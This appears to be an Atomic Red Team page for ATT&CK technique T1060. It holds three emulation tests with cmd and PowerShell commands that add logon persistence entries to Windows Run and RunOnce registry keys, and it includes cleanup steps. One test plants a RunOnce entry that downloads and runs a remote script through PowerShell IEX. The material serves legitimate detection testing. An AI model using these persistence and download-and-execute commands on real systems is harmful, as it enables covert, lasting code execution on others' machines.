# T1060 - Registry Run Keys / Startup Folder
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1060)
<blockquote>Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.

The following run keys are created by default on Windows systems:
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code>
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>

The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)

The following Registry keys can be used to set startup folder items for persistence:
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
* <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
* <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

The following Registry keys can control automatic startup of services during boot:
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code>

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>

The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit</code> and <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell</code> subkeys can automatically launch programs.

Programs listed in the load value of the registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> run when any user logs on.

By default, the multistring BootExecute value of the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.


Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.</blockquote>

## Atomic Tests

- [Atomic Test #1 - Reg Key Run](#atomic-test-1---reg-key-run)

- [Atomic Test #2 - Reg Key RunOnce](#atomic-test-2---reg-key-runonce)

- [Atomic Test #3 - PowerShell Registry RunOnce](#atomic-test-3---powershell-registry-runonce)


<br/>

## Atomic Test #1 - Reg Key Run
Run Key Persistence

Upon successful execution, cmd.exe will modify the registry by adding "Atomic Red Team" to the Run key. Output will be via stdout. 

**Supported Platforms:** Windows




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| command_to_execute | Thing to Run | Path | C:&#92;Path&#92;AtomicRedTeam.exe|


#### Attack Commands: Run with `command_prompt`! 


```cmd
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
```

#### Cleanup Commands:
```cmd
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
```





<br/>
<br/>

## Atomic Test #2 - Reg Key RunOnce
RunOnce Key Persistence.

Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. 

**Supported Platforms:** Windows




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | C:&#92;Path&#92;AtomicRedTeam.dll|


#### Attack Commands: Run with `command_prompt`! 


```cmd
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
```

#### Cleanup Commands:
```cmd
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
```





<br/>
<br/>

## Atomic Test #3 - PowerShell Registry RunOnce
RunOnce Key Persistence via PowerShell
Upon successful execution, a new entry will be added to the runonce item in the registry.

**Supported Platforms:** Windows




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | powershell.exe|
| reg_key_path | Path to registry key to update | Path | HKLM:&#92;Software&#92;Microsoft&#92;Windows&#92;CurrentVersion&#92;RunOnce|


#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
$RunOnceKey = "#{reg_key_path}"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
```

#### Cleanup Commands:
```powershell
Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
```





<br/>
